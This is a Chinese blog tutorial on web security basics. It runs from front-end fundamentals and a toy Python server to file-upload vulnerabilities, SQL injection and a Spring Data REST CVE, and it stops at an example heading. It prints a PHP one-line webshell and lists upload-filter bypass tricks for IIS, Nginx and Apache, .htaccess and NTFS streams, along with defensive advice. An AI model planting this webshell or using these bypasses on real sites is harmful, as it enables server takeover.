<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="Web安全基础, CS 宵烛 xiaozhu NightCandle 计算机 网络安全">
    <meta name="description" content="由浅入深地介绍Web领域的核心攻防技术、安全维护技术和安全运维技术，提升能力以安全地运维一个以Web服务为核心的业务线">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    

    <title>Web安全基础 | 宵烛 Blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 5.1.1">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">宵烛 Blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">宵烛 Blog</div>
        <div class="logo-desc">
            
            学生 | 虚假CTF选手 | 计算机菜鸟
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    
<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = 'dfac091ba9d0b40b01350f7f0326267b0eac51dd84d6d54d342218edab87b81a';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/37.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Web安全基础</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E5%89%8D%E7%AB%AF/">
                                <span class="chip bg-color">前端</span>
                            </a>
                        
                            <a href="/tags/web%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">web安全</span>
                            </a>
                        
                            <a href="/tags/%E5%90%8E%E7%AB%AF/">
                                <span class="chip bg-color">后端</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E5%AE%89%E5%85%A8/" class="post-category">
                                安全
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-01-27
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2021-08-25
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    3.7k
                </div>
                

                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.min.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="Web安全基础">Web安全基础</h2>
<h3 id="1-前端基础">1. 前端基础</h3>
<h4 id="1-1-前端开发">1.1 前端开发</h4>
<p>前端开发是创建Web页面或App等前端界面呈现给用户的过程</p>
<p>网页制作是Web1.0时代的产物，早期网站主要内容都是静态，以图片和文字为主，用户使用网站的行为也以浏览为主，随着互联网技术的发展和HTML5、CSS3的应用，现代网页更加美观，交互效果显著，功能更加强大</p>
<blockquote>
<p>**为什么前后端分离？**性能问题 &amp; 学习成本</p>
</blockquote>
<blockquote>
<p><strong>前后端的走向？</strong></p>
<p>前端：页面表现，速度流畅，兼容性，用户体验等等</p>
<p>后端：三高（高并发，高可用，高性能），安全，存储，业务等等</p>
</blockquote>
<h4 id="1-2-HTML入门">1.2 HTML入门</h4>
<h5 id="HTML介绍">HTML介绍</h5>
<p>HTML（ <code>HyperText Markup Language</code>）即超文本标记语言，是用来构建网页的一种语言</p>
<ul>
<li>
<p>HTML是一整套标记标签构成的标记语言，而非编程语言</p>
</li>
<li>
<p>HTML用于承载网页的内容（文本、图片、语音、视频）</p>
</li>
<li>
<p>通俗的讲：使用HTML标记标签与纯文本按规则构建的文档，通常也称为网页</p>
</li>
<li>
<p>浏览器对HTML文档解析，根据标签的顺序，按指定标签对应的规则显示纯文本内容</p>
</li>
</ul>
<h5 id="HTML网页结构">HTML网页结构</h5>
<p>一个标准的HTML页面由以下三个部分组成</p>
<ul>
<li>
<p>HTML版本声明：不是 HTML 标签，而是指示浏览器关于页面使用哪个 HTML 版本进行编写的指令</p>
</li>
<li>
<p>HTML头部：涉及页面标题、字符集、样式、链接等内容</p>
</li>
<li>
<p>HTML主体：浏览器展现给用户的内容，包括标题、文本、段落、链接、图片、媒体等，所有的页面内容都由HTML主体部分标签来实现</p>
</li>
</ul>
<h5 id="HTML标签-元素-属性">HTML标签/元素/属性</h5>
<h4 id="1-3-CSS入门">1.3 CSS入门</h4>
<p>层叠样式表（<code>Cascading Style Sheets</code>）是一种用来表现HTML（标准通用标记语言的一个应用）或XML（标准通用标记语言的一个子集）等文件样式的计算机语言</p>
<ul>
<li>CSS 能够对网页中元素位置的排版进行像素级精确控制，支持几乎所有的字体字号样式，拥有对网页对象和模型样式编辑的能力</li>
</ul>
<h4 id="1-4-JavaScript-入门">1.4 JavaScript 入门</h4>
<p>JavaScript，是可插入 HTML 页面，可以由绝大多数现代浏览器执行的轻量级的编程语言。</p>
<ul>
<li>
<p>是基于原型编程、多范式的动态脚本语言，并且支持面向对象、命令式和声明式（如函数式编程）风格</p>
</li>
<li>
<p>Node.js：简单的说 Node.js 就是运行在服务端的 JavaScript</p>
<ul>
<li>
<p>Node.js 是一个基于Chrome JavaScript 运行时建立的一个平台。</p>
</li>
<li>
<p>Node.js 是一个事件驱动 I/O 服务端 JavaScript 环境，基于 Google 的 V8 引擎</p>
</li>
</ul>
</li>
</ul>
<h5 id="JavaScript-功能">JavaScript 功能</h5>
<ul>
<li>做出反应</li>
</ul>
<pre class="line-numbers language-html" data-language="html"><code class="language-html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>button</span>	<span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>first<span class="token punctuation">"</span></span><span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>button<span class="token punctuation">"</span></span> <span class="token attr-name">onclick</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>alert(<span class="token punctuation">'</span>Welcome，hello world!<span class="token punctuation">'</span>)<span class="token punctuation">"</span></span><span class="token punctuation">&gt;</span></span>做出反应<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>button</span><span class="token punctuation">&gt;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<ul>
<li>改变HTML内容</li>
</ul>
<pre class="line-numbers language-html" data-language="html"><code class="language-html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>button</span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>second<span class="token punctuation">"</span></span>	<span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>button<span class="token punctuation">"</span></span> <span class="token attr-name">onclick</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>changeContent();<span class="token punctuation">"</span></span><span class="token punctuation">&gt;</span></span>改变HTML内容<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>button</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>p</span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>change<span class="token punctuation">"</span></span><span class="token punctuation">&gt;</span></span>开始了<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>p</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">&gt;</span></span><span class="token script"><span class="token language-javascript">
<span class="token keyword">function</span> <span class="token function">changeContent</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
	x<span class="token operator">=</span>document<span class="token punctuation">.</span><span class="token function">getElementById</span><span class="token punctuation">(</span><span class="token string">"change"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>		<span class="token comment">//查找元素 </span>
	x<span class="token punctuation">.</span>innerHTML<span class="token operator">=</span><span class="token string">"开始很久了，已经结束了"</span><span class="token punctuation">;</span>				
<span class="token punctuation">}</span>  
</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<ul>
<li>改变HTML样式</li>
<li>验证输入</li>
</ul>
<h3 id="2-Web-App简介">2. Web App简介</h3>
<p>Web App（或Web应用程序）运行于网络和标准浏览器上，基于网页技术开发实现特定功能的应用</p>
<ul>
<li>
<p>前端：HTML，CSS，JavaScript</p>
</li>
<li>
<p>后端：Java，Python，PHP</p>
</li>
<li>
<p>数据库：MySQL，Oracle，MongoDB</p>
</li>
<li>
<p>容器：Windows(IIS)，Linux(Nginx, Apache)</p>
</li>
</ul>
<p><img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210823-100700848.png" alt="web服务组件"></p>
<h5 id="从输入网址到看到网页过程">从输入网址到看到网页过程</h5>
<ul>
<li>
<p>客户输入URL，DNS解析URL得出IP地址，根据IP地址找出对应服务器</p>
</li>
<li>
<p>客户机通过TCP/IP协议建立到Web服务器的TCP链接</p>
</li>
<li>
<p>客户机向Web服务器发送HTTP请求报文，请求服务器里资源的资源文档</p>
</li>
<li>
<p>Web服务器接收到客户机的HTTP请求报文，然后向客户机发出HTTP响应报文</p>
<ul>
<li>请求的种类不同（HTML文档、PHP文件、访问数据库），服务器的行为不一样</li>
</ul>
</li>
<li>
<p>客户机解析HTML静态文档</p>
</li>
<li>
<p>客户机与服务器断开链接</p>
</li>
</ul>
<img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210821-web-process.png" style="zoom:80%;">
<h5 id="Python实现简单服务器">Python实现简单服务器</h5>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> socket

<span class="token keyword">def</span> <span class="token function">handleRequest</span><span class="token punctuation">(</span>client<span class="token punctuation">)</span><span class="token punctuation">:</span>
    buf <span class="token operator">=</span> client<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">2048</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>buf<span class="token punctuation">)</span>
    msg <span class="token operator">=</span> <span class="token string">"HTTP/1.1 200 OK\r\n\r\n"</span>
    msg1 <span class="token operator">=</span> <span class="token string">"Hello World!"</span>
    client<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token string">'%s'</span> <span class="token operator">%</span> msg<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    client<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token string">'%s'</span> <span class="token operator">%</span> msg1<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span>
    ip_port <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token string">'0.0.0.0'</span><span class="token punctuation">,</span> <span class="token number">8000</span><span class="token punctuation">)</span>
    sock <span class="token operator">=</span> socket<span class="token punctuation">.</span>socket<span class="token punctuation">(</span>socket<span class="token punctuation">.</span>AF_INET<span class="token punctuation">,</span> socket<span class="token punctuation">.</span>SOCK_STREAM<span class="token punctuation">)</span>
    sock<span class="token punctuation">.</span>bind<span class="token punctuation">(</span>ip_port<span class="token punctuation">)</span>
    sock<span class="token punctuation">.</span>listen<span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span>

    <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
        conn<span class="token punctuation">,</span> addr <span class="token operator">=</span> sock<span class="token punctuation">.</span>accept<span class="token punctuation">(</span><span class="token punctuation">)</span>
        handleRequest<span class="token punctuation">(</span>conn<span class="token punctuation">)</span>
        conn<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h5 id="框架">框架</h5>
<p>Web应用框架（Web application framework）是一种开发框架，用来支持动态网站、网络应用程序及网络服务的开发</p>
<ul>
<li>
<p>类型有基于请求的和基于组件的</p>
</li>
<li>
<p>有助于减轻网页开发时共通性活动的工作负荷，例如许多框架提供数据库访问接口、标准样板以及会话管理等</p>
</li>
<li>
<p>可提升代码的可再用性</p>
</li>
</ul>
<h3 id="3-Web安全总览">3. Web安全总览</h3>
<h4 id="3-1-协议基础">3.1 协议基础</h4>
<h5 id="HTTP协议">HTTP协议</h5>
<p>HTTP协议定义了Web客户端如何从Web服务器请求Web页面，以及服务器如何把Web页面传送给客户端</p>
<p><a href="https://night-candle.github.io/2021/02/04/cs-network-protocol/#toc-heading-5">HTTP/1.1</a></p>
<h4 id="3-2-安全溯源">3.2 安全溯源</h4>
<p>Web应用全部都是建立在HTTP协议基础上，是对HTTP协议的实际应用</p>
<p>Web应用在实现HTTP协议的过程中，没有做足够充足强大的约束，导致攻击者能够利用其中的薄弱环节进行攻击</p>
<p><img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210821-safety-traceability.png" alt=""></p>
<blockquote>
<p><strong>Web安全根本在于Web应用在实现HTTP协议的过程中，没有做足够充足强大的约束，导致攻击者能够利用其中的薄弱环节进行攻击</strong></p>
</blockquote>
<h4 id="3-3-安全问题">3.3 安全问题</h4>
<img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210821-sec-problem.png" style="zoom:80%;">
<h2 id="后端安全">后端安全</h2>
<h3 id="1-文件上传漏洞">1. 文件上传漏洞</h3>
<p>文件上传（<code>File Upload</code>）是大部分Web应用都具备的功能，例如用户上传附件、改头像、分享图片等</p>
<p>文件上传漏洞是在开发者没有做充足验证（包括前端，后端）情况下，允许用户上传恶意文件，这里上传的文件可以是木马、病毒、恶意脚本或者Webshell等</p>
<h4 id="1-1-编辑木马并上传">1.1 编辑木马并上传</h4>
<blockquote>
<p>关键函数</p>
<p><img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210822-eval.png" alt=""></p>
</blockquote>
<p>一句话木马</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> @<span class="token keyword">eval</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'cmd'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token delimiter important">?&gt;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210822-115203947.png" alt="测试"></p>
<h4 id="1-2-绕过方法">1.2 绕过方法</h4>
<h5 id="1-2-1-服务器关联型漏洞">1.2.1 服务器关联型漏洞</h5>
<p><strong>IIS 5.x / 6.0 解析漏洞</strong></p>
<p>当创建.asp的文件目录的时候，在此目录下的任意文件，服务器都解析为asp文件</p>
<p>漏洞利用：<a target="_blank" rel="noopener" href="http://www.xxx.com/xx.asp/xx.jpg">www.xxx.com/xx.asp/xx.jpg</a> 会被解析成asp文件</p>
<p>服务器默认不解析“;”以后的内容</p>
<p>漏洞利用：<a target="_blank" rel="noopener" href="http://www.xxx.com/xx.asp;.jpg">www.xxx.com/xx.asp;.jpg</a> 会被解析成为asp文件</p>
<p><strong>Nginx 解析漏洞</strong></p>
<p>低版本Nginx存在一个由PHP-CGI导致的文件解析漏洞：php.ini配置文件中cgi.fix_pathinfo默认是开启的，当URL中有不存在的文件时，PHP就会默认向前解析</p>
<p>漏洞利用：<a target="_blank" rel="noopener" href="http://xn--www-7n0jp43b.xx.com/phpinfo.jpg/1.php">访问www.xx.com/phpinfo.jpg/1.php</a> （1.php不存在，会按照php格式解析phpinfo.jpg文件）</p>
<p><strong>Apache 解析漏洞</strong></p>
<p>Apache 在1.x和2.x版本中存在解析漏洞：Apache从右至左开始判断后缀，跳过非可识别后缀，直到找到可识别后缀为止，然后将该可识别后缀进解析</p>
<p>漏洞利用：上传并访问shell.php.test；服务器会解析shell.php.test文件，但是按照php文件格式进行解析</p>
<h5 id="1-2-2-前端限制绕过">1.2.2 前端限制绕过</h5>
<p>只在前端利用 JavaScript 来做校验</p>
<p>漏洞利用：</p>
<ol>
<li>
<p>通过Burp Suite抓包，然后修改内容后放行</p>
</li>
<li>
<p>通过Chrome禁止/删除JavaScript代码</p>
</li>
</ol>
<h5 id="1-2-4-黑名单绕过">1.2.4 黑名单绕过</h5>
<ul>
<li>
<p>content-type绕过</p>
</li>
<li>
<p>大小写绕过</p>
<ul>
<li>
<p>Win平台大小写不敏感</p>
</li>
<li>
<p>Linux平台造成此现象主要原因是缺少speling模块，要在相应的系统里加载</p>
</li>
</ul>
</li>
<li>
<p>双写绕过</p>
</li>
<li>
<p>生僻扩展名绕过</p>
<ul>
<li>
<p>修改后缀为 .php3 .php4 .php5 等</p>
</li>
<li>
<p>原理：配置文件/etc/apache2/mods-enabled/php5.conf</p>
<p><img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210822-124322.png" alt=""></p>
</li>
</ul>
</li>
<li>
<p>扩展名加空格绕过</p>
</li>
<li>
<p>Windows 文件流特性绕过</p>
<ul>
<li>NTFS文件系统实现了<strong>多文件流特性</strong>，NTFS环境一个文件默认使用的是未命名的文件流，同时可创建其他命名的文件流，Windows资源管理器默认不显示出文件的命名文件流，这些命名的文件流在功能上和默认使用的未命名文件流一致，甚至可以用来启动程序</li>
<li>扩展名加点号绕过(Win)</li>
<li>扩展名加::$DATA绕过(Win)</li>
</ul>
</li>
<li>
<p>.htaccess绕过</p>
<ul>
<li>
<p><strong>.htaccess文件</strong>（分布式配置文件）提供了一种方式，使得配置文件可以随文件夹不同而不同，其所放置的文件夹及所有子文件夹都会受此影响，其语法同apache主配置文件，启用了.htaccess文件的网站，使用此文件类型来绕过限制较全面的黑名单过滤</p>
</li>
<li>
<p>漏洞利用：上传一个.htaccess文件，文件内容设置为【AddType application/x-httpd-php .test】，上传一句话木马文件，文件名设置为shell.test</p>
</li>
</ul>
</li>
<li>
<p>文件头检测绕过</p>
<ul>
<li>拼接png与php文件</li>
</ul>
</li>
</ul>
<h5 id="1-2-5-00截断绕过">1.2.5 %00截断绕过</h5>
<p>原理：保存文件的时候是路径拼接的形式，而路径又是从前端获取，所以可以采用在路径上截断</p>
<h5 id="1-2-6-漏洞链">1.2.6 漏洞链</h5>
<p>基于我们已经成功上传一句话木马内容的jpg，联合使用本地/远程文件包含漏洞，既可以完成渗透</p>
<blockquote>
<p><strong>Fuzz</strong></p>
<p><img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210822-fuzz.png" alt=""></p>
<p>模糊测试（fuzz testing）和渗透测试（penetration test）都是属于安全测试的方法，渗透测试一般是模拟黑客恶意入侵的方式对产品进行测试，对测试者的执行力要求很高，成本高，难以被大规模应用；而模糊测试，它能够充分利用机器本身，随机生成和发送数据；与此同时，又能够引进业内安全专家在安全性方面的建议</p>
<p><strong>注意事项</strong>：</p>
<ol>
<li>
<p>Fuzz过程由于会产生大量异常输入，未经人工分析，可能造成生产环境崩溃，因此多用于非生产环境</p>
</li>
<li>
<p>Fuzz过程会产生大量负载，可能会对生产环境造成影响</p>
</li>
<li>
<p>安全监测过程中很容易由于过多访问触发安全警报，进而为后续安全检测制造障碍</p>
</li>
</ol>
</blockquote>
<h4 id="1-3-防御方法">1.3 防御方法</h4>
<ul>
<li>
<p>文件类型检测：白名单优于黑名单</p>
</li>
<li>
<p>使用安全的函数进行编程</p>
</li>
<li>
<p>熟悉业务部署环境的OS、Web Server配置</p>
</li>
</ul>
<h3 id="2-SQL注入">2. SQL注入</h3>
<p>SQL注入漏洞是发生于应用程序与数据库层的安全漏洞。</p>
<p>网站内部直接发送的SQL请求一般不会有危险，但实际情况是很多时候需要结合用户的输入数据动态构造SQL语句，如果用户输入的数据被构造成恶意SQL代码，Web应用又未对动态构造的SQL语句使用的参数进行审查，则会带来意想不到的危险</p>
<h4 id="2-1-MySQL基础">2.1 MySQL基础</h4>
<p>1、学习函数</p>
<p>​    掌握以下函数的用法，并在命令行进行实践操作：concat()、group_concat()、concat_ws()、load_file()、hex()、char()、count()、substring()、into+outfile、LOAD DATA INFIL、limit</p>
<h4 id="GET-注入">GET 注入</h4>
<h4 id="POST-注入">POST 注入</h4>
<h4 id="OOB注入">OOB注入</h4>
<h4 id="WAF绕过">WAF绕过</h4>
<h4 id="SQLMap">SQLMap</h4>
<h3 id="3-框架安全">3. 框架安全</h3>
<p>随着应用开发的复杂度提升，很难再有完全从零开发的web应用，而更多的使用web框架，很大一部分开源框架得到了全世界的开发者支持，具备更加强大功能和完善的支持</p>
<p>开源框架的问题在于源码被全世界的开发者所阅读，一旦一个大型框架出现漏洞，那么黑客相当于拿到了所有使用这个框架的网站的通行证，几乎所有的大型框架都出现过漏洞，影响范围非常广</p>
<blockquote>
<p><strong>CVE- Common Vulnerabilities &amp; Exposures</strong>：广泛认同的信息安全漏洞或者已经暴露出来的弱点给出的一个公共名称</p>
<p>认定的一般流程：</p>
<p>发现—&gt;公开—&gt;编号—&gt;提案—&gt;修改—&gt;中间决策—&gt;最终决策—&gt;正式发布—&gt;（再评估）—&gt;（撤销）</p>
</blockquote>
<h4 id="spring-data-rest-（CVE-2017-8046）">spring-data-rest （CVE-2017-8046）</h4>
<p>Spring Data Rest设计的目的是消除curd的模板代码，减少程序员的刻板的重复劳动，增删改查动作分别对应四种请求类型：post、delete、update/patch、get</p>
<p><code>PATCH</code> 方法是 HTTP 协议新引入的，是对 PUT 方法的补充，使用 JSON 格式数据来对已知资源进行局部更新</p>
<ul>
<li>
<p>Spring 3.2 开始支持 PATCH 方法，但要选对部署的容器</p>
</li>
<li>
<p>由 RFC6902 所约束，需包含 path 和 op 字段</p>
</li>
<li>
<p>具有自己的 MIME 类型：application/json-patch+json</p>
</li>
<li>
<p>op 代表操作，必须存在，只能由6种明确表示操作的词汇组成，每一个操作结果作为下一个操作的对象，如果发生错误即返回错误信息，则全部变更不生效，成功返回204</p>
</li>
</ul>
<img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210825-132934071.png" style="zoom: 50%;">
<p><strong>漏洞示例：</strong></p>
